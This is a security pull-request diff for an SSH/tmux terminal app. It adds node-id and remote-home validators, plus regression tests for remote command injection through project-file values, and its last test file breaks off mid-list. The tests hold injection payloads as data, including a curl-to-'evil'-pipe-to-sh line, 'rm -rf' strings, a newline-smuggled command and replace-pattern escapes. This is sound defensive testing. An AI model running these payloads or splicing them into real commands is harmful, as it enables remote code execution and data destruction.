### PR TITLE
fix(security): quote remote env pairs and validate node ids before they reach a remote shell

### DIFF
--- a/src/core/agents/grok-paths.ts
+++ b/src/core/agents/grok-paths.ts
@@ -20,6 +20,7 @@
 //     summary.json  updates.jsonl  chat_history.jsonl  signals.json  plan.json  subagents/
 import path from 'path'
 import { homedir } from 'os'
+import { isSafeRemoteHome } from '../remote-safety'
 
 export const GROK_HOOK_FILE = 'nodeterm-status.json'
 export const GROK_SUMMARY_FILE = 'summary.json'
@@ -31,8 +32,6 @@ export const GROK_CHAT_HISTORY_FILE = 'chat_history.jsonl'
  *  slug+hash directory instead, which we cannot reconstruct — so we resolve nothing there. */
 export const GROK_ENCODED_CWD_MAX_BYTES = 255
 const GROK_SESSION_ID_MAX = 128
-/** Generous cap on a host-reported $GROK_HOME; longer than any real path, short enough to bound. */
-const REMOTE_HOME_MAX = 4096
 
 // Deliberately narrow — ONE known key, so a typo'd `{ GROK_HOM: … }` is a compile error instead of
 // a silent fall back to `~/.grok`. The cast on the default argument is what that costs: GrokEnv is a
@@ -117,11 +116,7 @@ export function grokSessionDir(a: { sessionsDir: string; cwd: string; sessionId:
  *  trim at the READ site — `ssh-project.ts`'s remote `$HOME` probe does — so the caller passes an
  *  already-trimmed string and a leftover newline means the read went wrong, not that we should cope. */
 export function isSafeRemoteGrokHome(p: string | undefined): boolean {
-  const v = p?.trim()
-  if (!v || v !== p) return false
-  if (!v.startsWith('/') || v.includes('\\') || v.length > REMOTE_HOME_MAX) return false
-  return !Array.from(v).some((ch) => {
-    const c = ch.charCodeAt(0)
-    return c <= 0x1f || c === 0x7f
-  })
+  // One rule for every host-reported home (`$HOME` and `$GROK_HOME` are the same kind of answer,
+  // interpolated into the same kind of remote command line) — see `isSafeRemoteHome`.
+  return isSafeRemoteHome(p)
 }

--- a/src/core/pty-coattach.test.ts
+++ b/src/core/pty-coattach.test.ts
@@ -923,13 +923,17 @@ describe('destroy/recycle: bounded, validated, rate-limited', () => {
 
   it('refuses a persistKey longer than REF_MAX_LEN (no tombstone, no subprocess)', async () => {
     const { REF_MAX_LEN } = await import('../shared/presence')
-    await manager()
+    const m = await manager()
     const huge = 'x'.repeat(REF_MAX_LEN + 1)
 
     await destroy(ALICE, huge)
-    // Nothing was recorded, so this is not a node anyone can be locked out of.
-    const other = await create(BOB, huge)
-    expect(other.closed).toBeUndefined()
+    // Nothing was recorded, so this is not a node anyone can be locked out of. Read the map
+    // DIRECTLY rather than probing with `create`: an over-long id is now refused at the create
+    // choke point too (the node-id guard, added with the remote-injection fix), so a create's
+    // outcome no longer distinguishes "no tombstone" from "refused for another reason".
+    expect((m as unknown as { tombstones: Map<string, unknown> }).tombstones.size).toBe(0)
+    // And the second layer, on the same value: it can never be spent on a spawn either.
+    await expect(create(BOB, huge)).rejects.toThrow(/node id/i)
   })
 
   it('bounds the tombstone map: the oldest entries are evicted, the newest still refuse', async () => {

--- a/src/core/pty-manager.ts
+++ b/src/core/pty-manager.ts
@@ -52,6 +52,7 @@ import { writeScrollback, readScrollback, deleteScrollback } from './scrollback-
 import { claudeConfigDirFor } from './claude-config-dir'
 import { findExecutableSync, findInPathString, resolveShellPath, shellPathNow } from './exec-path'
 import { AUTH_ENV_STRIP, accountTmuxEnvArgs, remoteAccountConfigDirAbs } from './claude-accounts-core'
+import { NODE_ID_MAX, isSafeNodeId } from './remote-safety'
 import { presenceHub } from './presence/hub'
 import {
   codexLauncherDir,
@@ -1415,6 +1416,26 @@ export class PtyManager {
   private async create(clientId: ClientId, options: PtyCreateOptions): Promise<PtyCreateResult> {
     const key = options.persistKey
     if (!key) return this.spawnNew(clientId, options)
+    // SECURITY — the choke point for the node id. Every session spawn (local tmux, plain shell,
+    // SSH remote) goes through here, `pty:create` validates its payload nowhere, and node ids come
+    // from `.nodeterm/project.json` — a file that travels in a cloned/shared repo and is written on
+    // remote hosts. The id reaches a REMOTE SHELL verbatim as `NODETERM_NODE_ID=<key>`; quoting at
+    // that splice (`remoteTmuxPtyArgs`) is the primary fix and this is the second layer, so a
+    // future splice that forgets to quote is not instantly exploitable.
+    //
+    // FAILURE DIRECTION — refuse, don't sanitise. Nothing legitimate is refused: every id the app
+    // mints comes from `nextId()` (`<prefix>-<base36>-<counter>`) or `uuid()`, both inside
+    // `[A-Za-z0-9._-]`. And sanitising would be worse than a refusal here rather than merely
+    // safer-looking: `NODETERM_NODE_ID` is a CROSS-BOUNDARY CONTRACT — Canvas.tsx keys
+    // `agentStatus.byId` off the raw node id — so a silently rewritten id would report status for a
+    // node that does not exist, i.e. a terminal that looks fine and is permanently dark. A thrown
+    // error surfaces in the pane where someone can read it.
+    if (!isSafeNodeId(key))
+      throw new Error(
+        `Refusing to open this terminal: its node id is not a safe id (allowed: letters, digits, ` +
+          `dot, dash, underscore; max ${NODE_ID_MAX}). A project file with an id like this cannot be ` +
+          `trusted — it is how a shared or cloned repo would smuggle a command onto a remote host.`
+      )
     // Co-attach: a live session for this node id already exists in THIS process (another client,
     // or this client's own second view). Subscribe to it instead of spawning a second tmux client
     // — `-D` would otherwise kick the first viewer off.

--- a/src/core/pty-persist-key-guard.test.ts
+++ b/src/core/pty-persist-key-guard.test.ts
@@ -1,0 +1,94 @@
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import { initPlatform, resetPlatformForTests } from './platform'
+import { fakePlatform, type FakePlatform } from './platform-fake'
+import { IPC } from '../shared/ipc'
+import type { PtyCreateOptions, PtyCreateResult } from '../shared/types'
+
+/**
+ * SECURITY — the choke point. Every session spawn (local tmux, plain shell, SSH remote) goes
+ * through `PtyManager.create`, and `persistKey` is the node id it carries all the way to the
+ * remote tmux command (`NODETERM_NODE_ID=<persistKey>`). The IPC registration validates it not at
+ * all, and node ids come from `.nodeterm/project.json` — a file that travels in a cloned/shared
+ * repo. Layer 1 (quoting in `remoteTmuxPtyArgs`) makes the value inert; this is layer 2, refusing
+ * it before any code path can spend it.
+ *
+ * Failure direction: REFUSE. Every id the app mints (`nextId()` = `<prefix>-<base36>-<counter>`,
+ * `uuid()`) passes, so nothing legitimate is refused; and sanitising instead would silently change
+ * the id that `NODETERM_NODE_ID` reports back, orphaning every hook event for that node.
+ */
+const spawned: Array<{ file: string; args: string[] }> = []
+
+vi.mock('node-pty', () => ({
+  spawn: (file: string, args: string[]) => {
+    spawned.push({ file, args })
+    return {
+      onData: () => {},
+      onExit: () => {},
+      write: () => {},
+      resize: () => {},
+      pause: () => {},
+      resume: () => {},
+      kill: () => {},
+      pid: 4321
+    }
+  }
+}))
+
+// Same reason as pty-require-remote.test.ts: keep the developer's own pty pressure out of this.
+vi.mock('./pty-devices', async (importOriginal) => ({
+  ...(await importOriginal<typeof import('./pty-devices')>()),
+  readPtyDevices: () => ({ ceiling: 511, inUse: 8 })
+}))
+
+const ALICE = 1
+
+describe('pty create: an unsafe persistKey never reaches a spawn', () => {
+  let fake: FakePlatform
+
+  beforeEach(async () => {
+    spawned.length = 0
+    fake = fakePlatform()
+    initPlatform(fake)
+    const { PtyManager } = await import('./pty-manager')
+    new PtyManager().registerIpc()
+  })
+  afterEach(() => {
+    resetPlatformForTests()
+  })
+
+  const create = (options: Partial<PtyCreateOptions>) =>
+    fake.handlers[IPC.ptyCreate](ALICE, { cols: 80, rows: 24, ...options }) as Promise<PtyCreateResult>
+
+  const UNSAFE = [
+    ['..', 'traversal'],
+    ['.', 'traversal'],
+    ['a/b', 'a path, not an id'],
+    ['a;b', 'a command separator'],
+    ['n1;curl${IFS}http://evil/x|sh;#', 'the proven remote-injection payload'],
+    ['a b', 'word splitting'],
+    ['a\nb', 'a second command line'],
+    ['a`id`', 'command substitution'],
+    ['a'.repeat(300), 'unbounded']
+  ] as const
+
+  for (const [key, why] of UNSAFE) {
+    it(`refuses ${JSON.stringify(key.slice(0, 40))} — ${why}`, async () => {
+      await expect(create({ persistKey: key, cwd: '/srv/app' })).rejects.toThrow(/node id/i)
+      expect(spawned).toHaveLength(0)
+    })
+  }
+
+  it('an EMPTY persistKey is not an unsafe id — it is "no persistence", and still spawns', async () => {
+    // `create()` already treats a falsy persistKey as the non-persistent path (`spawnNew` straight
+    // away). Refusing it here would break every ephemeral pty (previews, one-shot runs).
+    const res = await create({ persistKey: '', cwd: '/srv/app' })
+    expect(res.sessionId).not.toBe('')
+    expect(spawned).toHaveLength(1)
+  })
+
+  it('accepts the ids the app actually mints', async () => {
+    for (const key of ['term-mabc123-7', 'ssh-mabc123-1', '3f2a1b4c-7d8e-4f10-9a2b-1c3d5e7f9a0b'])
+      expect((await create({ persistKey: key, cwd: '/srv/app' })).sessionId).not.toBe('')
+    expect(spawned).toHaveLength(3)
+  })
+})

--- a/src/core/remote-safety.test.ts
+++ b/src/core/remote-safety.test.ts
@@ -1,0 +1,56 @@
+import { describe, expect, it } from 'vitest'
+import { NODE_ID_MAX, isSafeNodeId, isSafeRemoteHome } from './remote-safety'
+
+describe('isSafeNodeId', () => {
+  it('accepts every shape the app actually mints', () => {
+    // `nextId()` in state/workspace.ts: `<prefix>-<base36 time>-<counter>`.
+    for (const id of ['term-mabc123-7', 'ssh-mabc123-1', 'node-1', 'a', 'A_b.c-1', '9'])
+      expect(isSafeNodeId(id)).toBe(true)
+  })
+
+  it('refuses anything a remote shell could read as structure', () => {
+    for (const id of [
+      'a;b',
+      'a b',
+      'a|b',
+      'a$b',
+      'a`b`',
+      'a\nb',
+      'a\\b',
+      "a'b",
+      'a"b',
+      'n1;curl${IFS}http://evil/x|sh;#'
+    ])
+      expect(isSafeNodeId(id)).toBe(false)
+  })
+
+  it('refuses path-shaped and empty ids', () => {
+    for (const id of ['', '.', '..', 'a/b', '../../etc/passwd', undefined])
+      expect(isSafeNodeId(id)).toBe(false)
+  })
+
+  it('refuses an over-long id (a bounded value is a checkable value)', () => {
+    expect(isSafeNodeId('a'.repeat(NODE_ID_MAX))).toBe(true)
+    expect(isSafeNodeId('a'.repeat(NODE_ID_MAX + 1))).toBe(false)
+    expect(isSafeNodeId('a'.repeat(300))).toBe(false)
+  })
+})
+
+describe('isSafeRemoteHome', () => {
+  it('accepts real absolute homes, including spaces and non-ASCII', () => {
+    for (const h of ['/home/u', '/Users/Enes Kırca', '/var/lib/deploy', '/'])
+      expect(isSafeRemoteHome(h)).toBe(true)
+  })
+
+  it('refuses a host answer carrying a control character — the newline is a command separator', () => {
+    expect(isSafeRemoteHome('/home/u\nrm -rf /')).toBe(false)
+    expect(isSafeRemoteHome('/home/u\r')).toBe(false)
+    expect(isSafeRemoteHome('/home/u\t')).toBe(false)
+    expect(isSafeRemoteHome('/home/u\x7f')).toBe(false)
+  })
+
+  it('refuses relative / empty / backslashed / untrimmed / absurd answers', () => {
+    for (const h of ['', undefined, 'home/u', 'C:\\Users\\u', ' /home/u', '/home/u ', `/${'a'.repeat(5000)}`])
+      expect(isSafeRemoteHome(h)).toBe(false)
+  })
+})

--- a/src/core/remote-safety.test.ts
+++ b/src/core/remote-safety.test.ts
@@ -36,6 +36,55 @@ describe('isSafeNodeId', () => {
   })
 })
 
+/**
+ * FALSE-POSITIVE SWEEP. A validator that refuses something real is an outage, so the accept side is
+ * pinned against a broad list of homes and ids that actually occur — spaces, non-ASCII, apostrophes
+ * and a literal `$` included. Note `/home/u$x` and `/home/o'brien` are ACCEPTED on purpose: they
+ * are legal paths, and the defence against them is quoting at the splice, not this predicate.
+ */
+const REAL_HOMES = [
+  '/root',
+  '/home/enes',
+  '/home/user.name',
+  '/home/user-name',
+  '/Users/First Last',
+  '/Users/Enes Kırca',
+  '/home/ünal',
+  '/home/用户',
+  '/export/home/u',
+  '/var/lib/jenkins',
+  '/home/u/',
+  '/home/u+group',
+  "/home/o'brien",
+  '/home/u$x',
+  '/data/homes/dept 3/u',
+  '/home/u.d/nested',
+  '/System/Volumes/Data/Users/e'
+]
+
+const REAL_NODE_IDS = [
+  'term-mabc-3',
+  'ssh-m1a2b3-12',
+  'editor-m9-1',
+  'group-m4-7',
+  'sticky-mz-1',
+  'dino-m1-1',
+  'browser-m1-2',
+  'diff-m1-3',
+  'video-m1-4',
+  'web-m1-5',
+  '550e8400-e29b-41d4-a716-446655440000'
+]
+
+describe('no false positives on values that really occur', () => {
+  it('accepts every realistic remote home', () => {
+    for (const h of REAL_HOMES) expect(isSafeRemoteHome(h), h).toBe(true)
+  })
+  it('accepts every id shape the app mints', () => {
+    for (const id of REAL_NODE_IDS) expect(isSafeNodeId(id), id).toBe(true)
+  })
+})
+
 describe('isSafeRemoteHome', () => {
   it('accepts real absolute homes, including spaces and non-ASCII', () => {
     for (const h of ['/home/u', '/Users/Enes Kırca', '/var/lib/deploy', '/'])

--- a/src/core/remote-safety.ts
+++ b/src/core/remote-safety.ts
@@ -1,0 +1,62 @@
+/**
+ * Predicates for values that cross into a REMOTE SHELL.
+ *
+ * Both of these guard the same class of bug: a string that arrived as DATA (a node id read out of
+ * `.nodeterm/project.json`, a `$HOME` a host printed back at us) ends up inside a command line the
+ * remote user's shell parses. Quoting at the splice site is the primary defence — see
+ * `remoteTmuxPtyArgs` and `RemoteHooks.setup` — and these are the second layer, applied where the
+ * value ENTERS the system so a future splice that forgets to quote is not instantly exploitable.
+ *
+ * No node/electron imports: usable from core, main, and the server shell alike.
+ */
+
+/** Generous cap on a node id — longer than anything the app mints, short enough to bound. */
+export const NODE_ID_MAX = 128
+/** Generous cap on a host-reported `$HOME`; longer than any real path (PATH_MAX on Linux). */
+export const REMOTE_HOME_MAX = 4096
+
+/**
+ * Is this a node id (a `persistKey`) safe to carry into a remote command line and a filesystem
+ * path?
+ *
+ * Charset is deliberately narrower than "no metacharacters": `[A-Za-z0-9._-]` covers every id the
+ * app actually produces — `nextId()` emits `<prefix>-<base36 time>-<counter>` and `uuid()` emits
+ * hex-with-dashes — so the answer to "could this refuse something legitimate?" is a list, not a
+ * guess. `.` and `..` are refused on top of the charset: they pass it but name a directory, and
+ * these ids are also used as path components (session files, per-node remote state). It is also
+ * the charset the codex identity shim ALREADY enforces on `$NODETERM_NODE_ID` before it will use
+ * it (`codex-identity-proxy.ts`: `*[!A-Za-z0-9._-]*) nt_fail node-id-unavailable`), so this is the
+ * existing rule moved to the boundary rather than a new one invented here.
+ *
+ * An EMPTY id is refused here and must be handled by the caller as "not persistent" rather than as
+ * a violation — `PtyManager.create` already branches on a falsy `persistKey` before it asks.
+ */
+export function isSafeNodeId(id: string | undefined | null): boolean {
+  if (!id || id.length > NODE_ID_MAX) return false
+  if (id === '.' || id === '..') return false
+  return /^[A-Za-z0-9._-]+$/.test(id)
+}
+
+/**
+ * Is a remote host's answer to `printf %s "$HOME"` usable for building remote paths?
+ *
+ * The host's answer is data, not truth. Only an absolute POSIX path with no backslash and no
+ * control character is usable — a newline in particular is a COMMAND SEPARATOR on the remote
+ * command lines the caller then builds. Spaces and non-ASCII are permitted: `/Users/Enes Kırca` is
+ * a real home, and rejecting it would disable hooks for that user; the caller quotes the value, so
+ * a space is a quoting problem, not a safety one.
+ *
+ * Like `isSafeRemoteGrokHome` (which delegates here) it judges the EXACT string the caller holds —
+ * surrounding whitespace is a rejection, not something this quietly strips. Trimming here would
+ * return `true` about a value whose embedded `\n` the caller is about to interpolate. Remote reads
+ * trim at the READ site instead.
+ */
+export function isSafeRemoteHome(p: string | undefined | null): boolean {
+  const v = p?.trim()
+  if (!v || v !== p) return false
+  if (!v.startsWith('/') || v.includes('\\') || v.length > REMOTE_HOME_MAX) return false
+  return !Array.from(v).some((ch) => {
+    const c = ch.charCodeAt(0)
+    return c <= 0x1f || c === 0x7f
+  })
+}

--- a/src/core/remote-ssh/control-master.injection.test.ts
+++ b/src/core/remote-ssh/control-master.injection.test.ts
@@ -1,0 +1,143 @@
+import { describe, expect, it } from 'vitest'
+import { remoteHookEnvArgs, remoteTmuxPtyArgs } from './control-master'
+import { accountTmuxEnvArgs } from '../claude-accounts-core'
+
+/**
+ * SECURITY REGRESSION TEST — remote command injection through a node id.
+ *
+ * `remoteTmuxPtyArgs` builds ONE SHELL LINE that `ssh -t` hands to the remote user's login shell.
+ * Everything in it is `posixQuote`d except, until this fix, the `extraEnv` `-e KEY=VALUE` pairs,
+ * which carry the RAW React Flow node id (`remoteHookEnvArgs` → `NODETERM_NODE_ID=<id>`) and the
+ * managed-account config dir. A node id lives in `.nodeterm/project.json`, a file that travels in
+ * a cloned/shared repo and is written on remote hosts — i.e. it is attacker-supplied data. The
+ * proven payload was:
+ *
+ *   tmux -L nodeterm-rmt new-session -A -e NODETERM_HOOK_ENDPOINT=/ep \
+ *     -e NODETERM_NODE_ID=n1;curl${IFS}http://evil/x|sh;# … -s 'nt-n1' -c '/home/u'
+ *
+ * where the `;` ends the tmux command and the rest runs as the SSH user the moment the victim
+ * opens that node. The LOCAL path was never exposed: it spawns tmux with an argv array, and
+ * `sessionName()` sanitises the session name to `[A-Za-z0-9_-]` anyway.
+ *
+ * The assertion is therefore about SHELL STRUCTURE, not about a substring: parse the line the way
+ * `sh` would and require that (a) no metacharacter survives outside single quotes and (b) the whole
+ * payload lands as ONE literal argv element. Delete the quoting in `remoteTmuxPtyArgs` and both
+ * halves fail.
+ */
+
+/** Every character that is command STRUCTURE to a POSIX shell when it appears unquoted. */
+const META = '|&;<>()$`"\n\r*?[]{}!#~\\'
+
+/**
+ * Parse a remote command line the way `sh` would: single quotes are literal, whitespace splits
+ * words. Returns the resulting argv plus every metacharacter that survived OUTSIDE single quotes —
+ * a non-empty `unquotedMeta` means the line carries shell structure the caller did not intend.
+ */
+function shellParse(cmd: string): { argv: string[]; unquotedMeta: string[] } {
+  const argv: string[] = []
+  const unquotedMeta: string[] = []
+  let cur = ''
+  let started = false
+  let inQuote = false
+  const flush = (): void => {
+    if (started) argv.push(cur)
+    cur = ''
+    started = false
+  }
+  for (let i = 0; i < cmd.length; i++) {
+    const ch = cmd[i]
+    if (inQuote) {
+      // Inside '…' every byte is literal, including metacharacters, until the closing quote.
+      if (ch === "'") inQuote = false
+      else cur += ch
+      continue
+    }
+    if (ch === "'") {
+      inQuote = true
+      started = true
+      continue
+    }
+    // A backslash OUTSIDE quotes escapes the next byte — it is how `posixQuote` re-enters a single
+    // quote (`'\''`), so it is data, not structure, and must not be counted as a metacharacter.
+    if (ch === '\\' && i + 1 < cmd.length) {
+      cur += cmd[++i]
+      started = true
+      continue
+    }
+    if (ch === ' ' || ch === '\t') {
+      flush()
+      continue
+    }
+    if (META.includes(ch)) unquotedMeta.push(ch)
+    cur += ch
+    started = true
+  }
+  flush()
+  return { argv, unquotedMeta }
+}
+
+const conn = { host: 'h.example.com', user: 'deploy', port: 2222, identityFile: '/k/id' }
+
+/** Every shell escape an attacker gets from a project.json node id, in one string. */
+const PAYLOAD = "n1;curl${IFS}http://evil/x|sh;#`id`$(id)&&rm -rf ~\nwhoami\r'quote'\"dq\""
+
+describe('remoteTmuxPtyArgs: an attacker-controlled node id is DATA, never command structure', () => {
+  it('the parser itself sees structure in an UNQUOTED payload (guards the assertion)', () => {
+    // Without this the test could pass because the parser is blind rather than because the code
+    // quotes. Feed it the pre-fix shape by hand and require it to notice.
+    const bad = shellParse(`tmux new-session -A -e NODETERM_NODE_ID=${PAYLOAD} -s 'nt-n1'`)
+    expect(bad.unquotedMeta.length).toBeGreaterThan(0)
+  })
+
+  it('splices the hook env pairs as literal single arguments (node id payload and all)', () => {
+    const args = remoteTmuxPtyArgs(
+      conn,
+      '/s.sock',
+      'nt-n1',
+      '/home/u',
+      undefined,
+      undefined,
+      remoteHookEnvArgs('/home/u/.nodeterm/hook-endpoint-p1.env', PAYLOAD, '1', 'claude'),
+      '/home/u/.nodeterm/tmux.conf'
+    )
+    const cmd = args[args.length - 1]
+    const { argv, unquotedMeta } = shellParse(cmd)
+    // (a) nothing in the line is command structure any more.
+    expect(unquotedMeta).toEqual([])
+    // (b) the payload is ONE argument, verbatim — tmux gets it as an env value, sh never sees it.
+    expect(argv).toContain(`NODETERM_NODE_ID=${PAYLOAD}`)
+    // and the command is still exactly one tmux invocation with the expected shape.
+    expect(argv.slice(0, 3)).toEqual(['tmux', '-L', 'nodeterm-rmt'])
+    expect(argv.filter((a) => a === 'new-session')).toHaveLength(1)
+    expect(argv).toContain('nt-n1')
+    expect(argv).toContain('/home/u')
+  })
+
+  it('quotes the managed-account CLAUDE_CONFIG_DIR pair too (same splice, same file provenance)', () => {
+    // `accountId` and the remote `$HOME` both reach this splice; neither is quoted by its producer.
+    const args = remoteTmuxPtyArgs(conn, '/s.sock', 'nt-n1', '/home/u', undefined, undefined, [
+      ...accountTmuxEnvArgs('/home/u/.nodeterm/claude-accounts/a;id;b')
+    ])
+    const { argv, unquotedMeta } = shellParse(args[args.length - 1])
+    expect(unquotedMeta).toEqual([])
+    expect(argv).toContain('CLAUDE_CONFIG_DIR=/home/u/.nodeterm/claude-accounts/a;id;b')
+  })
+
+  it('leaves a benign node id readable in the argv (the quoting is not lossy)', () => {
+    const args = remoteTmuxPtyArgs(conn, '/s.sock', 'nt-term-1', '/srv/app', undefined, undefined, [
+      '-e',
+      'NODETERM_HOOK_ENDPOINT=/home/u/.nodeterm/hook-endpoint-p1.env',
+      '-e',
+      'NODETERM_NODE_ID=term-mabc-3'
+    ])
+    const { argv } = shellParse(args[args.length - 1])
+    expect(argv).toContain('-e')
+    expect(argv).toContain('NODETERM_NODE_ID=term-mabc-3')
+    expect(argv).toContain('NODETERM_HOOK_ENDPOINT=/home/u/.nodeterm/hook-endpoint-p1.env')
+    // The `-e` pairs still sit between `-A` and `-s`, where tmux requires them.
+    const i = argv.indexOf('-A')
+    const s = argv.indexOf('-s')
+    expect(argv.indexOf('NODETERM_NODE_ID=term-mabc-3')).toBeGreaterThan(i)
+    expect(argv.indexOf('NODETERM_NODE_ID=term-mabc-3')).toBeLessThan(s)
+  })
+})

--- a/src/core/remote-ssh/control-master.injection.test.ts
+++ b/src/core/remote-ssh/control-master.injection.test.ts
@@ -78,8 +78,26 @@ function shellParse(cmd: string): { argv: string[]; unquotedMeta: string[] } {
 
 const conn = { host: 'h.example.com', user: 'deploy', port: 2222, identityFile: '/k/id' }
 
-/** Every shell escape an attacker gets from a project.json node id, in one string. */
-const PAYLOAD = "n1;curl${IFS}http://evil/x|sh;#`id`$(id)&&rm -rf ~\nwhoami\r'quote'\"dq\""
+/**
+ * Every shell escape an attacker gets from a project.json node id, in one string.
+ *
+ * `$'`, `` $` ``, `$&` and `$$` are here for a SECOND reason and must not be dropped: they are
+ * `String.prototype.replace` REPLACEMENT PATTERNS. The first version of this fix quoted correctly
+ * and then passed the quoted string as `replace`'s string argument, where `$'` expands to the text
+ * FOLLOWING the match — splicing `-s '<session>' -c '<cwd>' …` inside the token and inverting its
+ * quote parity. Quoting is not enough on its own; how the quoted bytes are spliced matters too.
+ */
+const PAYLOAD =
+  "n1;curl${IFS}http://evil/x|sh;#`id`$(id)&&rm -rf ~\nwhoami\r'quote'\"dq\"$'$`$&$$"
+
+/**
+ * Values that land AFTER the `-e` pairs in the built line — the region a replacement-pattern
+ * escape would drag inside the quotes. They are hostile ON PURPOSE and must stay that way: pinning
+ * them benign is exactly what let the `$'` defect pass a green suite. All three come from the same
+ * `.nodeterm/project.json` as the node id.
+ */
+const HOSTILE_CWD = '/srv/app;id;#'
+const HOSTILE_PROGRAM_ARGS = ['--resume', 'sess;id;#']
 
 describe('remoteTmuxPtyArgs: an attacker-controlled node id is DATA, never command structure', () => {
   it('the parser itself sees structure in an UNQUOTED payload (guards the assertion)', () => {
@@ -94,9 +112,9 @@ describe('remoteTmuxPtyArgs: an attacker-controlled node id is DATA, never comma
       conn,
       '/s.sock',
       'nt-n1',
-      '/home/u',
-      undefined,
-      undefined,
+      HOSTILE_CWD,
+      'claude',
+      HOSTILE_PROGRAM_ARGS,
       remoteHookEnvArgs('/home/u/.nodeterm/hook-endpoint-p1.env', PAYLOAD, '1', 'claude'),
       '/home/u/.nodeterm/tmux.conf'
     )
@@ -106,11 +124,33 @@ describe('remoteTmuxPtyArgs: an attacker-controlled node id is DATA, never comma
     expect(unquotedMeta).toEqual([])
     // (b) the payload is ONE argument, verbatim — tmux gets it as an env value, sh never sees it.
     expect(argv).toContain(`NODETERM_NODE_ID=${PAYLOAD}`)
+    // (c) the region AFTER the splice is intact too: a replacement-pattern escape (`$'`) would
+    // have dragged these inside the quotes and turned their `;` into command structure.
+    expect(argv).toContain(HOSTILE_CWD)
+    expect(argv).toContain('sess;id;#')
     // and the command is still exactly one tmux invocation with the expected shape.
     expect(argv.slice(0, 3)).toEqual(['tmux', '-L', 'nodeterm-rmt'])
     expect(argv.filter((a) => a === 'new-session')).toHaveLength(1)
     expect(argv).toContain('nt-n1')
-    expect(argv).toContain('/home/u')
+  })
+
+  it("an agent id carrying a $' replacement pattern cannot invert the rest of the line", () => {
+    // The exact reviewer PoC shape: the NODE ID is legitimate, the escape rides another
+    // project.json field (`node.data.agentId`) into the same splice.
+    const args = remoteTmuxPtyArgs(
+      conn,
+      '/s.sock',
+      'nt-term-mabc-3',
+      HOSTILE_CWD,
+      undefined,
+      undefined,
+      remoteHookEnvArgs('/home/u/.nodeterm/hook-endpoint-p1.env', 'term-mabc-3', '1', "claude$'"),
+      '/home/u/.nodeterm/tmux.conf'
+    )
+    const { argv, unquotedMeta } = shellParse(args[args.length - 1])
+    expect(unquotedMeta).toEqual([])
+    expect(argv).toContain("NODETERM_AGENT_ID=claude$'")
+    expect(argv).toContain(HOSTILE_CWD)
   })
 
   it('quotes the managed-account CLAUDE_CONFIG_DIR pair too (same splice, same file provenance)', () => {

--- a/src/core/remote-ssh/control-master.realsh.test.ts
+++ b/src/core/remote-ssh/control-master.realsh.test.ts
@@ -1,0 +1,188 @@
+// SECURITY — the remote command line, executed by a REAL /bin/sh.
+//
+// The sibling `control-master.injection.test.ts` asserts structure with a hand-rolled parser. This
+// file trusts no parser of ours: it runs the line `remoteTmuxPtyArgs` builds through the actual
+// shell, with a stub `tmux` on PATH that dumps its argv NUL-separated and canary programs that
+// leave a marker file if an injection ever reaches them. If a payload becomes command structure,
+// a marker appears.
+//
+// It exists because a parser-only test PASSED the `$'` defect: `posixQuote` was correct, but the
+// quoted string was handed to `String.prototype.replace` as a STRING replacement, where `$'`
+// expands to the text following the match. Only execution catches a class of bug like that
+// reliably — the parser has to be taught each new trick, the shell already knows them all.
+import { describe, expect, it, beforeAll } from 'vitest'
+import { execFileSync } from 'child_process'
+import fs from 'fs'
+import os from 'os'
+import path from 'path'
+import { remoteHookEnvArgs, remoteTmuxPtyArgs } from './control-master'
+import { accountTmuxEnvArgs, remoteAccountConfigDirAbs } from '../claude-accounts-core'
+import { isSafeNodeId, isSafeRemoteHome } from '../remote-safety'
+
+const conn = { host: 'h.example.com', user: 'deploy', port: 2222, identityFile: '/k/id' }
+
+let binDir: string
+let markerDir: string
+
+beforeAll(() => {
+  const root = fs.mkdtempSync(path.join(os.tmpdir(), 'ntsh-'))
+  binDir = path.join(root, 'bin')
+  markerDir = path.join(root, 'markers')
+  fs.mkdirSync(binDir)
+  fs.mkdirSync(markerDir)
+  // stub tmux: prints its argv NUL-separated, so the test sees exactly what tmux would receive.
+  fs.writeFileSync(path.join(binDir, 'tmux'), `#!/bin/sh\nfor a in "$@"; do printf '%s\\0' "$a"; done\n`, {
+    mode: 0o755
+  })
+  // canaries an injection would reach for; each drops a marker file.
+  for (const name of ['curl', 'id', 'whoami', 'rm', 'sh_pwn']) {
+    fs.writeFileSync(path.join(binDir, name), `#!/bin/sh\ntouch ${markerDir}/${name}\nexit 0\n`, {
+      mode: 0o755
+    })
+  }
+})
+
+/** Run a built remote command line through a real sh; report tmux's argv and any canary fired. */
+function runReal(cmd: string): { argv: string[]; markers: string[]; extraStdout: string } {
+  fs.readdirSync(markerDir).forEach((f) => fs.unlinkSync(path.join(markerDir, f)))
+  let out = ''
+  try {
+    out = execFileSync('/bin/sh', ['-c', cmd], {
+      env: { PATH: `${binDir}:/usr/bin:/bin`, HOME: '/home/u' },
+      encoding: 'utf8',
+      stdio: ['ignore', 'pipe', 'pipe']
+    })
+  } catch (e) {
+    // A non-zero exit is not the subject — whether a canary RAN is. Keep whatever stdout arrived.
+    out = String((e as { stdout?: string }).stdout ?? '')
+  }
+  const parts = out.split('\0')
+  const trailing = parts.pop() ?? ''
+  return { argv: parts, markers: fs.readdirSync(markerDir).sort(), extraStdout: trailing }
+}
+
+const build = (nodeId: string): string =>
+  remoteTmuxPtyArgs(
+    conn,
+    '/s.sock',
+    'nt-n1',
+    '/home/u',
+    undefined,
+    undefined,
+    remoteHookEnvArgs('/home/u/.nodeterm/hook-endpoint-p1.env', nodeId, '1', 'claude'),
+    '/home/u/.nodeterm/tmux.conf'
+  ).slice(-1)[0]
+
+const PAYLOADS: Record<string, string> = {
+  semicolon: 'n1;id;#',
+  pipe: 'n1|sh_pwn',
+  and: 'n1&&id',
+  or: 'n1||id',
+  cmdsub: 'n1$(id)',
+  backtick: 'n1`id`',
+  IFS: 'n1;curl${IFS}http://evil/x|sh_pwn;#',
+  newline: 'n1\nid\n',
+  cr: 'n1\rid',
+  singleQuote: "n1'id'",
+  alreadyQuoted: "'n1'",
+  embeddedEscape: "n1'\\''id;#",
+  embeddedEscape2: "a'\\''b",
+  closeThenSub: "n1'$(id)'",
+  closeThenNl: "n1'\nid\n'",
+  glob: 'n1*',
+  redirect: 'n1>/tmp/ntsh-pwn',
+  bg: 'n1&',
+  tilde: 'n1~/x',
+  varExp: 'n1$HOME',
+  dollarQuote: "n1$'\\x41'",
+  bangHist: 'n1!!',
+  brace: 'n1{a,b}',
+  whitespace: 'n1\t tab and space',
+  // `String.prototype.replace` replacement patterns — the class that defeated the first fix.
+  replMatch: 'n1$&',
+  replBefore: 'n1$`',
